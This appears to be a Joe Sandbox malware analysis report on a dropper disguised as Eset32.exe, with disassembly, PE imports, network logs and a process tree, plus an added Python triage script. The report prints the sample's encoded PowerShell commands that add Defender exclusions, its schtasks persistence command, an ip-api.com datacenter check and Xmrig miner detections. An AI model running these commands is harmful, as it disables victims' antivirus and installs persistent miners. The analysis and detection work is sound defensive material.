                                                        mov dword ptr [esp+10h], 0040A198h
                                                        mov dword ptr [esp+20h], ebx
                                                        mov byte ptr [esp+14h], 00000020h
                                                        call dword ptr [004080B8h]
                                                        call dword ptr [004080BCh]
                                                        and eax, BFFFFFFFh
                                                        cmp ax, 00000006h
                                                        mov dword ptr [0042F42Ch], eax
                                                        je 00007F0995393483h
                                                        push ebx
                                                        call 00007F09953965E6h
                                                        cmp eax, ebx
                                                        je 00007F0995393479h
                                                        push 00000C00h
                                                        call eax
                                                        mov esi, 004082A0h
                                                        push esi
                                                        call 00007F0995396562h
                                                        push esi
                                                        call dword ptr [004080CCh]
                                                        lea esi, dword ptr [esi+eax+01h]
                                                        cmp byte ptr [esi], bl
                                                        jne 00007F099539345Dh
                                                        push 0000000Bh
                                                        call 00007F09953965BAh
                                                        push 00000009h
                                                        call 00007F09953965B3h
                                                        push 00000007h
                                                        mov dword ptr [0042F424h], eax
                                                        call 00007F09953965A7h
                                                        cmp eax, ebx
                                                        je 00007F0995393481h
                                                        push 0000001Eh
                                                        call eax
                                                        test eax, eax
                                                        je 00007F0995393479h
                                                        or byte ptr [0042F42Fh], 00000040h
                                                        push ebp
                                                        call dword ptr [00408038h]
                                                        push ebx
                                                        call dword ptr [00408288h]
                                                        mov dword ptr [0042F4F8h], eax
                                                        push ebx
                                                        lea eax, dword ptr [esp+38h]
                                                        push 00000160h
                                                        push eax
                                                        push ebx
                                                        push 00429850h
                                                        call dword ptr [0040816Ch]
                                                        push 0040A188h
                                                        Programming Language:
                                                        • [EXP] VC++ 6.0 SP5 build 8804
                                                        Name | Virtual Address | Virtual Size | Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8544 | 0xa0 | .rdata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x38000 | 0x10fa0 | .rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x3f099c | 0x2200 |
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x29c | .rdata
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                        Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                        .text | 0x1000 | 0x6457 | 0x6600 | False | 0.66823682598 | data | 6.43498570321 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                        .rdata | 0x8000 | 0x1380 | 0x1400 | False | 0.4625 | data | 5.26100389731 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .data | 0xa000 | 0x25538 | 0x600 | False | 0.463541666667 | data | 4.133728555 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                        .ndata | 0x30000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .rsrc | 0x38000 | 0x10fa0 | 0x11000 | False | 0.147073184743 | data | 3.75019672411 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        Name | RVA | Size | Type | Language | Country
                                                        RT_ICON | 0x38190 | 0x10828 | dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0 | English | United States
                                                        RT_DIALOG | 0x489b8 | 0x100 | data | English | United States
                                                        RT_DIALOG | 0x48ab8 | 0x11c | data | English | United States
                                                        RT_DIALOG | 0x48bd8 | 0x60 | data | English | United States
                                                        RT_GROUP_ICON | 0x48c38 | 0x14 | data | English | United States
                                                        RT_MANIFEST | 0x48c50 | 0x34b | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States
                                                        DLL | Import
                                                        ADVAPI32.dll | RegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
                                                        SHELL32.dll | SHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
                                                        ole32.dll | IIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
                                                        COMCTL32.dll | ImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                        USER32.dll | SetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
                                                        GDI32.dll | SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                        KERNEL32.dll | GetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, ReadFile, GetTempFileNameA, WriteFile, RemoveDirectoryA, CreateProcessA, CreateFileA, GetLastError, CreateThread, CreateDirectoryA, GlobalUnlock, GetDiskFreeSpaceA, GlobalLock, SetErrorMode, GetVersion, lstrcpynA, GetCommandLineA, GetTempPathA, lstrlenA, SetEnvironmentVariableA, ExitProcess, GetWindowsDirectoryA, GetCurrentProcess, GetModuleFileNameA, CopyFileA, GetTickCount, Sleep, GetFileSize, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv
                                                        Language of compilation system | Country where language is spoken
                                                        English | United States
                                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                        Mar 24, 2022 22:09:52.593719006 CET | 49773 | 80 | 192.168.2.5 | 208.95.112.1
                                                        Mar 24, 2022 22:09:52.623347998 CET | 80 | 49773 | 208.95.112.1 | 192.168.2.5
                                                        Mar 24, 2022 22:09:52.623478889 CET | 49773 | 80 | 192.168.2.5 | 208.95.112.1
                                                        Mar 24, 2022 22:09:52.624797106 CET | 49773 | 80 | 192.168.2.5 | 208.95.112.1
                                                        Mar 24, 2022 22:09:52.654623985 CET | 80 | 49773 | 208.95.112.1 | 192.168.2.5
                                                        Mar 24, 2022 22:09:52.758847952 CET | 49773 | 80 | 192.168.2.5 | 208.95.112.1
                                                        Mar 24, 2022 22:10:23.416403055 CET | 80 | 49773 | 208.95.112.1 | 192.168.2.5
                                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                        Mar 24, 2022 22:09:52.541419029 CET | 63712 | 53 | 192.168.2.5 | 8.8.8.8
                                                        Mar 24, 2022 22:09:52.572071075 CET | 53 | 63712 | 8.8.8.8 | 192.168.2.5
                                                        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                                        Mar 24, 2022 22:09:52.541419029 CET | 192.168.2.5 | 8.8.8.8 | 0xe21d | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001)
                                                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                                        Mar 24, 2022 22:09:52.572071075 CET | 8.8.8.8 | 192.168.2.5 | 0xe21d | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001)
                                                        • ip-api.com
                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        0 | 192.168.2.5 | 49773 | 208.95.112.1 | 80 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Mar 24, 2022 22:09:52.624797106 CET | 935 | OUT | GET /line/?fields=hosting HTTP/1.1
                                                        Host: ip-api.com
                                                        Connection: Keep-Alive
                                                        Mar 24, 2022 22:09:52.654623985 CET | 935 | IN | HTTP/1.1 200 OK
                                                        Date: Thu, 24 Mar 2022 21:09:51 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Content-Length: 5
                                                        Access-Control-Allow-Origin: *
                                                        X-Ttl: 60
                                                        X-Rl: 44
                                                        Data Raw: 74 72 75 65 0a
                                                        Data Ascii: true
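Two of the observables recorded above are worth automating in triage: the PowerShell transcripts show `powershell -EncodedCommand <base64>` host lines whose payload decodes to `Add-MpPreference -ExclusionPath ...` and `Add-MpPreference -ExclusionExtension ...` (Defender exclusion tampering), and the HTTP log shows the .NET payload asking ip-api.com for the `hosting` field of its own public IP, which answers whether it runs in a datacenter. The script below is an added example, not Joe Sandbox output or code from the sample: it decodes every encoded command in a transcript (the payload is base64 over UTF-16LE, so `-EncodedCommand` must be decoded as UTF-16LE, not UTF-8) and flags Defender tampering, then flags IP-lookup requests and the hosting check. The sample transcript is assembled from header lines quoted on this page; the list of lookup services beyond ip-api.com and the function names are this example's own choices.

```python
"""Added triage example (not Joe Sandbox output): decode -EncodedCommand payloads
from a PowerShell transcript and flag Defender exclusion tampering; flag
IP-lookup requests such as the ip-api.com hosting check seen in the HTTP log."""
from __future__ import annotations

import base64
import re
from urllib.parse import parse_qs, urlsplit

# "powershell -EncodedCommand <b64>" (also the -e/-ec/-enc short forms).
ENCODED_CMD = re.compile(
    r"powershell(?:\.exe)?\b.*?\s-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/]+={0,2})",
    re.IGNORECASE,
)

# Add-/Set-MpPreference parameters that weaken Defender (ATT&CK T1562.001).
DEFENDER_TAMPER = re.compile(
    r"\b(?:Add|Set)-MpPreference\b[^\r\n]*?-(Exclusion(?:Path|Extension|Process|IpAddress)|Disable\w+)",
    re.IGNORECASE,
)

# Public IP-lookup services. ip-api.com is the one contacted here; the others
# are common alternatives chosen for this example.
IP_LOOKUP_HOSTS = {
    "ip-api.com", "ipinfo.io", "api.ipify.org", "icanhazip.com",
    "checkip.amazonaws.com", "ifconfig.me",
}


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand carries the script as base64 over its UTF-16LE bytes."""
    return base64.b64decode(b64, validate=True).decode("utf-16-le")


def scan_transcript(text: str) -> list[dict]:
    """One finding per transcript header whose host application ran an
    encoded command that touches Defender preferences."""
    findings = []
    for block in text.split("Windows PowerShell transcript start")[1:]:
        host = re.search(r"^Host Application:\s*(.+)$", block, re.MULTILINE)
        pid = re.search(r"^Process ID:\s*(\d+)$", block, re.MULTILINE)
        enc = ENCODED_CMD.search(host.group(1)) if host else None
        if not enc:
            continue
        try:
            script = decode_encoded_command(enc.group(1))
        except ValueError:  # not valid base64 or not UTF-16LE: nothing to inspect
            continue
        hit = DEFENDER_TAMPER.search(script)
        if hit:
            findings.append({
                "pid": int(pid.group(1)) if pid else None,
                "parameter": hit.group(1),
                "script": script,
            })
    return findings


def scan_http_request(request_line: str, host: str) -> dict | None:
    """Flag a request to an IP-lookup service. ip-api.com's 'hosting' field
    reports whether the caller's public IP belongs to a hosting provider,
    which lets a sample tell an analysis VM from a residential victim."""
    if host.lower() not in IP_LOOKUP_HOSTS:
        return None
    _method, target, _version = request_line.split(" ", 2)
    parts = urlsplit(target)
    fields = parse_qs(parts.query).get("fields", [""])[0].split(",")
    return {"host": host, "path": parts.path, "fields": fields,
            "hosting_check": "hosting" in fields}


# Header lines of two transcripts from this report ("..": CRLF in the preview).
SAMPLE_TRANSCRIPT = """**********************
Windows PowerShell transcript start
Start time: 20220324221056
Machine: 841618 (Microsoft Windows NT 10.0.17134.0)
Host Application: powershell -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA
Process ID: 6236
**********************
**********************
Windows PowerShell transcript start
Start time: 20220324221114
Machine: 841618 (Microsoft Windows NT 10.0.17134.0)
Host Application: powershell -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=
Process ID: 6536
**********************
"""

if __name__ == "__main__":
    for f in scan_transcript(SAMPLE_TRANSCRIPT):
        print(f"PID {f['pid']}: -{f['parameter']} via encoded command -> {f['script']}")
    print(scan_http_request("GET /line/?fields=hosting HTTP/1.1", "ip-api.com"))
```

On a live host the same transcripts are produced only where PowerShell transcription is enabled; the `Host Application` line is the field to key on because it survives even when the body of the transcript is truncated, as the previews above are. The response body `true` means ip-api.com classified the sandbox's egress address as hosting infrastructure.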
                                                        Target ID:0
                                                        Start time:22:09:31
                                                        Start date:24/03/2022
                                                        Path:C:\Users\user\Desktop\Eset32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\Eset32.exe"
                                                        Imagebase:0x400000
                                                        File size:4139932 bytes
                                                        MD5 hash:B405BF6533C047B1A47CECED3B42C23B
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low

                                                        Target ID:1
                                                        Start time:22:09:32
                                                        Start date:24/03/2022
                                                        Path:C:\Users\user\AppData\Roaming\12.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Users\user\AppData\Roaming\12.exe
                                                        Imagebase:0x370000
                                                        File size:2149888 bytes
                                                        MD5 hash:7ADD9A3AB1734828F756F2725C452C9A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Antivirus matches:
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 60%, Virustotal, Browse
                                                        • Detection: 60%, ReversingLabs
                                                        Reputation:low

                                                        Target ID:4
                                                        Start time:22:09:34
                                                        Start date:24/03/2022
                                                        Path:C:\Users\user\AppData\Roaming\1.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\AppData\Roaming\1.exe
                                                        Imagebase:0x400000
                                                        File size:4462384 bytes
                                                        MD5 hash:D9F92868EEE8D3C8ECD29A7969419D29
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Antivirus matches:
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 37%, Virustotal, Browse
                                                        • Detection: 45%, ReversingLabs
                                                        Reputation:low

                                                        Target ID:5
                                                        Start time:22:09:36
                                                        Start date:24/03/2022
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff77f440000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Target ID:6
                                                        Start time:22:09:37
                                                        Start date:24/03/2022
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                        Imagebase:0x880000
                                                        File size:98912 bytes
                                                        MD5 hash:6807F903AC06FF7E1670181378690B22
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Reputation:high

                                                        Target ID:8
                                                        Start time:22:09:44
                                                        Start date:24/03/2022
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
                                                        Imagebase:0x7ff602050000
                                                        File size:273920 bytes
                                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Target ID:9
                                                        Start time:22:09:45
                                                        Start date:24/03/2022
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff77f440000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Target ID:10
                                                        Start time:22:09:46
                                                        Start date:24/03/2022
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
                                                        Imagebase:0x7ff619710000
                                                        File size:447488 bytes
                                                        MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Reputation:high

                                                        Target ID:16
                                                        Start time:22:10:17
                                                        Start date:24/03/2022
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
                                                        Imagebase:0x7ff619710000
                                                        File size:447488 bytes
                                                        MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Reputation:high

                                                        Target ID:18
                                                        Start time:22:10:28
                                                        Start date:24/03/2022
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "System" /tr "C:\Users\user\AppData\Roaming\Windows\System.exe
                                                        Imagebase:0x7ff602050000
                                                        File size:273920 bytes
                                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Target ID:19
                                                        Start time:22:10:28
                                                        Start date:24/03/2022
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff77f440000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Target ID:20
                                                        Start time:22:10:29
                                                        Start date:24/03/2022
                                                        Path:C:\Windows\System32\schtasks.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:schtasks /create /f /sc onlogon /rl highest /tn "System" /tr "C:\Users\user\AppData\Roaming\Windows\System.exe"
                                                        Imagebase:0x7ff69c230000
                                                        File size:226816 bytes
                                                        MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Target ID:22
                                                        Start time:22:10:30
                                                        Start date:24/03/2022
                                                        Path:C:\Users\user\AppData\Roaming\Windows\System.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Users\user\AppData\Roaming\Windows\System.exe
                                                        Imagebase:0x1c0000
                                                        File size:2149888 bytes
                                                        MD5 hash:7ADD9A3AB1734828F756F2725C452C9A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Antivirus matches:
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 60%, Virustotal, Browse
                                                        • Detection: 60%, ReversingLabs

                                                        Target ID:23
                                                        Start time:22:10:31
                                                        Start date:24/03/2022
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd" cmd /c "C:\Users\user\AppData\Roaming\Windows\System.exe
                                                        Imagebase:0x7ff602050000
                                                        File size:273920 bytes
                                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Target ID:24
                                                        Start time:22:10:32
                                                        Start date:24/03/2022
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff77f440000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Target ID:26
                                                        Start time:22:10:32
                                                        Start date:24/03/2022
                                                        Path:C:\Users\user\AppData\Roaming\Windows\System.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Users\user\AppData\Roaming\Windows\System.exe
                                                        Imagebase:0xd10000
                                                        File size:2149888 bytes
                                                        MD5 hash:7ADD9A3AB1734828F756F2725C452C9A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 0000001A.00000002.701574814.00000000184D6000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001A.00000002.701574814.00000000184D6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001A.00000002.701782612.0000000018691000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                        Target ID:28
                                                        Start time:22:10:47
                                                        Start date:24/03/2022
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
                                                        Imagebase:0x7ff602050000
                                                        File size:273920 bytes
                                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Target ID:29
                                                        Start time:22:10:48
                                                        Start date:24/03/2022
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff77f440000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Target ID:30
                                                        Start time:22:10:48
                                                        Start date:24/03/2022
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
                                                        Imagebase:0x7ff619710000
                                                        File size:447488 bytes
                                                        MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET

                                                        Target ID:31
                                                        Start time:22:10:51
                                                        Start date:24/03/2022
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
                                                        Imagebase:0x7ff602050000
                                                        File size:273920 bytes
                                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Target ID:32
                                                        Start time:22:10:52
                                                        Start date:24/03/2022
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff77f440000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Target ID:33
                                                        Start time:22:10:53
                                                        Start date:24/03/2022
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
